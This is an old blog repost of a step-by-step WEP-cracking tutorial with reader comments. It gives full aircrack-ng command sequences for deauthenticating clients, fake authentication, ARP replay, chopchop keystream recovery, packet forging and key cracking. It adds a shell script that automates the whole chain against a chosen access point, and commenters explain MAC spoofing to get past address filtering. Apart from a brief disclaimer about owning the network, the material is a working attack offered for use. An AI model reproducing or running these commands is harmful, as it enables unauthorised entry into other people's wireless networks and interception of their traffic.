Hacking – Wep Cracking – Ultimate Guide (Video)

7 08 2006

I just cut and pasted the whole article, namely because this is a great guide. I have seen many, many screen-recorded guides and a whole video on the subject, but the hard text is way more helpful. BTW – Backtrack has its final release out now. It so totally rocks.

Cracking WEP: The ultimate guide

[ via profit42 ]

##### Preparation #####

1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)

2. Install BackTrack to your hard drive or just boot the live CD (username: root, password: toor; don’t forget to start the GUI: type startx on the command line after logging in).

3. Start up a terminal and put your wireless interface in monitor mode.

iwconfig [wireless interface] mode monitor

* To find out what your wireless interface is called, type iwconfig and press enter; all interfaces will show up (mine is ath0).

4. Start airodump-ng by typing in the terminal (press enter after typing it in):

airodump-ng --ivs -w capture [wireless interface]

5. When airodump-ng finds the network you want to crack it will show up. Note the BSSID (the access point’s MAC address), the SSID (the access point’s name) and the channel. The --ivs option makes airodump-ng save only the initialization vectors, to a file named capture-01.ivs (the number goes up each time you start it), and the #Data column is the count of IVs collected so far; that count is what the rest of this guide waits on. Don’t close this terminal window or stop airodump-ng before you have the WEP key!

##### Generating data, method one: There are clients visible in airodump associated with the network #####

1. Open a new terminal window and type in (press enter after typing it in):

aireplay-ng --arpreplay -b [the BSSID you found with airodump] -h 01:02:03:04:05:06 [wireless interface]

Every 01:02:03:04:05:06 in this guide stands for a real MAC address and must be replaced; typed literally, aireplay-ng rejects it. For -h use the MAC address of a client that airodump shows as associated (the access point already accepts frames from it) or, failing that, your own card’s MAC address. Note the two dashes in --arpreplay; a single dash is a different, invalid option.

2. Open another new terminal window and type in (press enter after typing it in):

aireplay-ng --deauth 10 -a [the BSSID you found with airodump] -c [the client’s MAC address] [wireless interface]

Here -a is always the access point and -c is the client to kick off. When the client reconnects it usually sends an ARP request, which is exactly the packet the arpreplay window is waiting for; once captured, that request is replayed over and over and the access point answers each one with a freshly encrypted packet, which is where the IVs come from.

3. Wait a while, approximately 10 minutes. You should see the #Data field in airodump-ng rising. Once you have around 500,000 IVs, go to the cracking step of this tutorial. (Later aircrack-ng releases, with the PTW attack, normally recover a 128-bit key from well under 100,000, so it does no harm to try the cracking step earlier and keep collecting if it fails.)

##### Generating data, method two: There are NO clients visible in airodump associated with the network #####

1. Open a new terminal window and type in (do NOT press enter yet!):

aireplay-ng --arpreplay -b [the BSSID you found with airodump] -h 01:02:03:04:05:06 [wireless interface]

2. Open another new terminal window and type in (do NOT press enter yet!):

aireplay-ng --fakeauth 0 -e [the SSID which you found with airodump] -a [the BSSID you found with airodump] -h 01:02:03:04:05:06 [wireless interface]

--fakeauth needs a number after it, the delay in seconds between re-authentications (0 means authenticate once); without it aireplay-ng stops with “invalid reauthentication delay or missing value”. The -h MAC address must be your own card’s address (replace the placeholder), and it has to be the same address in both windows. If the access point filters MAC addresses the fake authentication fails until you set your card’s address to one the access point allows.

3. Press enter in the fakeauth terminal, and as soon as it reports a successful association, press enter in the arpreplay window as quickly as possible.

4. Open another new terminal window and type in (press enter after typing it in):

aireplay-ng --deauth 10 -a [the BSSID you found with airodump] -c 01:02:03:04:05:06 [wireless interface]

This kicks your own fake client off the access point so that it re-associates. With no real clients there is nobody else to provoke into sending an ARP request, so if the #Data field is already rising you can skip this step.

5. Wait a while, approximately 10 minutes. You should see the #Data field in airodump-ng rising. Once you have around 500,000 IVs, go to the cracking step of this tutorial.

##### If the above two methods aren’t working, try this #####

1. Open a new terminal window and type in (press enter after typing it in):

aireplay-ng --fakeauth 0 -e [the SSID which you found with airodump] -a [the BSSID you found with airodump] -h 01:02:03:04:05:06 [wireless interface]

2. Open another new terminal window and type in (press enter after typing it in):

aireplay-ng --chopchop -b [the BSSID you found with airodump] -h 01:02:03:04:05:06 [wireless interface]

3. Chopchop starts reading packets. When it finds a usable one it asks whether to use it; answer y. It then recovers the packet’s plaintext one byte at a time, which takes a few seconds to a few minutes, and at the end prints two file names: replay_dec-*.cap holding the decrypted packet and replay_dec-*.xor holding the recovered keystream for that packet’s IV. Remember both.

4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open the replay_dec-*.cap file written by the chopchop attack (it is in the directory you ran aireplay-ng from, normally your home folder). The .xor file is raw keystream, not a capture, so Ethereal can show nothing useful for it.

5. Look at the decrypted packet in Ethereal and find the source IP and the destination IP; write both addresses down.

6. Open a terminal and type in (press enter after typing it in):

arpforge-ng [the .xor file from the chopchop attack] 1 [the BSSID you found with airodump] 01:02:03:04:05:06 [the source IP] [the destination IP] arp.cap

Mode 1 forges an ARP request from the source IP to the destination IP and encrypts it with the recovered keystream, reusing the same IV. WEP does nothing to stop IV reuse, so the access point accepts the forged packet exactly as if a real client had sent it. In later aircrack-ng releases arpforge-ng was replaced by packetforge-ng, which does the same job with named options instead of positional arguments.

7. In a new terminal window, or in the same one, type in (and press enter):

aireplay-ng -2 -r arp.cap [wireless interface]

-2 is interactive replay: it reads the forged packet from arp.cap, shows it and asks whether to use it; answer y and it replays it continuously.

8. Wait a while, approximately 10 minutes. You should see the #Data field in airodump-ng rising. Once you have around 500,000 IVs, go to the cracking step of this tutorial.

##### The actual cracking of the WEP key #####

1. Open a new terminal window and type in:

aircrack-ng -n 64 capture-01.ivs (for 64-bit WEP, i.e. a 40-bit key plus the 24-bit IV; press enter after typing)

or

aircrack-ng -n 128 capture-01.ivs (for 128-bit WEP, i.e. a 104-bit key plus the 24-bit IV; press enter after typing)

If you don’t know how strong the encryption is, run both in different terminals and start a third terminal, leaving out -n so that aircrack-ng tries the key lengths itself:

aircrack-ng capture-01.ivs

2. Wait a few minutes. Check the terminal(s). The key shows up automatically when it is found. Keep airodump-ng running: when aircrack-ng fails it re-reads the capture file and tries again as more IVs arrive, so you can leave both running.
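
The whole chain described above (monitor mode, airodump-ng, fake authentication, ARP replay, aircrack-ng) as one script, added here as an example; it is not part of the original post and not aircrack-ng’s own code. It assumes aircrack-ng 1.x option names (--fakeauth with a delay, --arpreplay, --deauth with a count, interface last), airodump-ng’s --output-format, -c and --bssid options, and the CSV that airodump-ng writes next to capture-01.ivs, with the BSSID in the first column and the “# IV” count in the eleventh. The CSV inside sample_csv is constructed for offline testing; its addresses and counts are made up. The script refuses the guide’s 01:02:03:04:05:06 placeholder (the cause of the “Invalid AP MAC address” errors in the comments below) and waits on the IV count instead of watching the screen. Run it with DRY_RUN=1 to see the exact command lines without touching a wireless card.

```shell
#!/bin/sh
# Added example (not from the original post and not aircrack-ng's own code):
# the guide's procedure as one script, with the checks the comment thread
# shows people tripping over. Assumes aircrack-ng 1.x option names
# (--fakeauth <delay>, --arpreplay, --deauth <count>, interface last) and
# that "airodump-ng -w capture" writes capture-01.ivs plus capture-01.csv.
set -u

# Every external command goes through run, so DRY_RUN=1 prints the exact
# command line instead of executing it (no wireless card needed to check syntax).
run() {
    if [ -n "${DRY_RUN:-}" ]; then printf '%s\n' "$*"; else "$@"; fi
}

# A MAC address is six hex bytes separated by colons. The guide's
# 01:02:03:04:05:06 is a placeholder; typed literally it is what produces
# the "Invalid AP MAC address" complaints in the comments, so reject it.
valid_mac() {
    printf '%s\n' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$' || return 1
    case "$1" in
        01:02:03:04:05:06) return 1 ;;
    esac
    return 0
}

# The guide's aireplay-ng invocations with the corrected flags: two dashes,
# a delay after --fakeauth, -a for the access point, -c for the client.
fakeauth()  { run aireplay-ng --fakeauth 0 -e "$1" -a "$2" -h "$3" "$4"; } # essid bssid ourmac iface
arpreplay() { run aireplay-ng --arpreplay -b "$1" -h "$2" "$3"; }          # bssid ourmac iface
deauth()    { run aireplay-ng --deauth 10 -a "$1" -c "$2" "$3"; }          # bssid client iface
crack()     { run aircrack-ng -n "$1" "$2"; }                              # 64|128 ivsfile

# Read the "# IV" column (the eleventh) for one BSSID from airodump-ng's CSV,
# so "enough data" is decided by the count rather than by watching the screen.
iv_count() {
    [ -r "$1" ] || { echo 0; return; }
    awk -F', *' -v b="$2" '
        toupper($1) == toupper(b) && $11 ~ /^[0-9]+$/ { print $11; found = 1 }
        END { if (!found) print 0 }' "$1"
}
enough_ivs() { [ "$(iv_count "$1" "$2")" -ge "$3" ]; }

# Constructed sample in airodump-ng's CSV layout (one WEP network and one
# station); the addresses and counts are made up, for offline testing only.
sample_csv() {
    cat > "$1" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:0D:88:97:DB:2C, 2006-08-07 12:00:00, 2006-08-07 12:10:00,  6,  54, WEP , WEP, , -40,     1200,    48213,   0.  0.  0.  0,   5, dlink, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2006-08-07 12:01:00, 2006-08-07 12:09:00, -50,      812, 00:0D:88:97:DB:2C, dlink
EOF
}

# Usage: sh wep-guide.sh <iface> <bssid> <essid> <our-mac> <channel>
main() {
    iface=$1 bssid=$2 essid=$3 mymac=$4 chan=$5
    valid_mac "$bssid" || { echo "not a usable BSSID: $bssid" >&2; return 2; }
    valid_mac "$mymac" || { echo "not a usable source MAC (replace the placeholder): $mymac" >&2; return 2; }
    run iwconfig "$iface" mode monitor
    # Lock onto the target's channel and BSSID so the IV count is not diluted
    # by neighbouring networks; the guide captured everything in range.
    run airodump-ng --output-format ivs,csv -c "$chan" --bssid "$bssid" -w capture "$iface" &
    sleep 5
    fakeauth "$essid" "$bssid" "$mymac" "$iface" &
    arpreplay "$bssid" "$mymac" "$iface" &
    # The guide waits for ~500,000 IVs; PTW-era aircrack-ng usually succeeds with
    # far fewer, so start at 40,000. airodump-ng keeps running throughout.
    until enough_ivs capture-01.csv "$bssid" 40000; do sleep 30; done
    crack 128 capture-01.ivs
}

if [ "$#" -eq 5 ]; then main "$@"; fi
```

Each aireplay-ng step is a small function so the command line it builds can be inspected under DRY_RUN=1 before anything is transmitted, which is how the syntax problems in the comments (one dash instead of two, the placeholder MAC, the missing fakeauth delay) would have been caught at a glance.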

DISCLAIMER: I don’t think I have to mention that you need written permission from the owner of the network before you are allowed to start cracking his WEP, or even before you are allowed to capture packets. Just try it with your own network. You’ll learn a lot about it. But never ever try it with another network than your own.

I’ve done it to my own WiFi at home and the simplicity of it is mind boggling. My philosophy is that the more people have out there that shows the lack of security, the more the security-aware people will actually make their apps/hardware/code secure.

This text “how to” may be a bit confusing because you can’t see the command line; for us visual learners that is a bit of a handicap. So I hunted around for the old Whoppix WEP cracking AVI. Every link I could find that took me to a direct view of the video (originally presented in Flash) was dead, so I found a place to DL the actual file. I wanted to preserve the best quality so I just posted it for download. Click the link below to DL the ORIGINAL video file from Rapidshare. (BTW – it’s around 50mb)

Download The 7z File Here>> It is labeled Wep Cracking AVI.7z
This is themostboringblogintheworld saying keep information free.


28 responses

6 12 2006
Eric

Hey, you say in the guide here https://themostboringblogintheworld.wordpress.com/2006/08/07/hacking-wep-cracking-ultimate-guide/ that you just burn backtrack to your hard drive or a CD, but it’s not that easy? I’ve tried heaps of times, some as just ISO images, some as boot disks, and nothing works. How the flip do you burn this ISO? Ideally I do it to my hard drive. I got Alcohol 120 and tried mounting the ISO? I’m puzzled? Can you help, mate?

18 10 2009
JHAWK65

Hey, if you have Windows (ugh), I did it with CDXP burner. Just get a CD or DVD and click burn ISO image, wait for the burnt CD or DVD to pop out of the drive if you have a laptop, and put it back in and boot from CD. If you want to know how to install it to your hard drive then email me at jhawk65@ymail.com and I will be more than happy to tell you how to do so, because you have to manually install it; there is no installer program. That’s what I did. I’m on it right now actually and have never been happier with an OS like this. 🙂

25 04 2011
Hacking Hamster

You download the .iso image then install the iso image onto a usb flashdrive that has been formatted into FAT32. To install Backtrack, use Unetbootin to help you. My site http://www.hackinghamster.com has the full tutorial and more! Hack wifi WEP/WPA and perform MITM attacks. Learn how to defend from all those too! Good Luck.

6 12 2006
therealdonquixote

A. I Don’t think you can boot from a mounted image, seeing as how you need your windows OS running with the proper drivers installed to use the virtual drive.

B. You can burn the ISO to a CD with Nero, or for a free option try HTfireman; it’s a good freeware utility specifically for burning ISOs. Then boot from the disc. (Of course I am assuming that you have space on your HDD that is clear and ready for BT to be installed on??) Once you are able to actually boot from the disc, then run the regular installer that is in the backtrack folder.

If none of what you have tried has worked, then you need to 1. Re-download the image file 2. Check to make sure your Bios is set up to check the CD drive to boot from first.

Hope this helps. Email me if you run into trouble. BTW use the stable version (final release), not the betas, to try this with. The betas are still a little buggy; that’s why they are betas 😉

22 12 2006
blah

“aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06” after entering this in backtrack 1 or 2 i get the following error: (Invalid AP MAC Address) this is what i entered: aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06) cannot figure out what the problem is.

22 12 2006
blah

sorry for previous reply – “aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06″

after entering this in backtrack 1 or 2 i get the following error:
(Invalid AP MAC Address) this is what i entered: aireplay-ng ath1 -arpreplay -e dlink -b 00:0D:88:97:DB:2C -h 00:02:03:04:05:06″, cannot figure out what the problem is.

9 06 2007
pretorian

your link is not working to the video – please update it

20 06 2007
Screwt-K

Yo guy, just to tell you that it is aircrack-ng and not airecrack-ng

22 06 2007
mcinnocent

I have the same problem as BLAH:
i always get the error:
Invalid AP MAC Address

whats wrong?

22 06 2007
therealdonquixote

Everyone, this post is deprecated, as in it’s really old; you can see its oldness in that 64-bit encryption is mentioned. No one has 64-bit encryption anymore unless they have a really old ass WiFi router. It’s all 128-bit and up from here on out. There are many better and more modern tutorials out there right now. I’m pretty sure I have a new one in the blog somewhere.

As for the “Invalid AP MAC address” issue:
It’s hard to answer the question without knowing every step you have taken, which method you are using, or even (and sorry for sounding like a RTFM nazi) if you are following the directions to the letter (note: some of the methods require that you do not press enter right away).

Obviously it has something to do with the MAC address that you are using for the access point that you are trying to crack. Can you open up Kismet and see if the signal strength on that MAC address is strong enough to crack? Sometimes you find an AP and the signal is so crap that you can’t really crack it because it falls in and out of “range”.

Honestly, I got no other ideas. Try scouring the forums at remote exploit!! They are really helpful.

22 06 2007
beeeaph

The AP you’re trying to break has MAC address filtering, so you need to find the address of one of the computers that can access it and then change your MAC address to that, then try it again.

23 06 2007
therealdonquixote

Dude, beeeaph. Nice catch there. Never would have thought of that, not in a million years. You deserve a link on me blogroll…if you have a site!!

Its not much, but its all I have to show appreciation for peeps being helpful and not flaming us n00bs. 🙂

TRDQ
Admin and Head n00b
TheMostBoringBlogInTheWorld

29 06 2007
Kris

when I type:
aireplay-ng ra0 –fakeauth -e Homelan -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx
the problem is:” invalid reauthentication delay or missing value”
What’s wrong?

1 07 2007
newb

can someone plz update link to DL video?

thanks

7 07 2007
ccc

For the people with the “Invalid AP MAC address” error, note that the command has TWO dashes in front of the “arpreplay” parameter (--arpreplay), unlike the later parameters that have one dash. Putting a single dash breaks things.

To make it easier, you can just use “aireplay-ng -3 …” instead of “aireplay-ng --arpreplay …”

17 07 2007
mon_mike

I had the same problem “invalid AP MAC address”; I think the problem was in the way you typed it. Instead of typing “-arpreplay” type “--arpreplay” with two bars.

17 07 2007
mon_mike

sorry for double post, I made a mistake: it’s not -arpreplay but it’s --arpreplay

17 07 2007
mon_mike

-- arpreplay: this forum doesn’t allow you to put two drew

19 07 2007
nutmonkey

Everyone w/ the “Invalid MAC Address” error, you are getting this b/c 01:02:03:04:05:06 <-- was just syntax showing you that you are supposed to put a valid MAC address here. In other words, replace that with the MAC address of the wireless adapter you are using.

This is a good little write-up…found a few options here that I wasn’t sure how to use. Thanks!

29 07 2007
wi-fi

to newb: try this tutorial for Ubuntu Hacking WEP or WEP Crack Windows> Tutorial.

29 08 2007
King Solomon

You can try this tutorial video, different than text above, but good itself:

http://rapidshare.com/files/41288971/WEP_Cracking_.avi

30 08 2007
RandomJoe

It would also be a good idea to look at spoofing your MAC address to look like a real client that is allowed on the network, perhaps one spotted by “Kismet” or similar but not currently associated with the AP.

With backtrack2 (OS) this is often done for you: if you enter a “wrong” MAC then it sets it up for you with an
ifconfig [wireless interface] hw ether 00:12:34:56:78:90
command (or is that iwconfig). Newbie myself, but got this working now 🙂
This will also help if MAC filtering is on on your chosen target AP.

7 09 2007
george

Everyone, this guide is appalling, and if you try to use it with the latest release of aircrack-ng or Backtrack 2, then it’s not going to work properly. For a start, the fakeauth part should have a value afterwards. This is why some people are getting invalid reauthentication values. You need a value between 0 and 6000. Go on the aircrack-ng website and do some homework. This guide will get you nowhere. (This is coming from me, because like you, I found this guide straight away and nothing fucking worked!! It’s shit.)

10 06 2008
i4free

welcome to http://www.i4free.co.cc to know more than here…

21 11 2008
johnny ronnald

hi, I use an rt73 chipset. It can support packet injection, but can’t inject at 500pps; I can inject only around 399pps. Can someone tell me why and help me to solve this problem? I crack WEP using Windows. It takes around 10-20 minutes to get the key. So tired of waiting.
I crack using Windows+VMware+USB wifi. I just took 1 hour to learn cracking WEP using Windows. I just found the tutorial here: tutorial cracking wireless WEP using Windows

21 11 2008
CRACKING WEP USE WINDOWS IN 3 MINUTE

thanks johnny ronnald. great tutorial. very clean. can find tutorial here > Tutorial Cracking Wireless Wep Use Windows <

25 04 2011
Hacking Hamster

Nice tutorial. To see another way to hack WEP/WPA keys check out my site http://www.hackinghamster.com . I can do it under five minutes and you can too. Also check out my newborn hamsters on my site!

25 04 2011
Hacking Hamster

google Hacking hamster and you will see the better tutorial
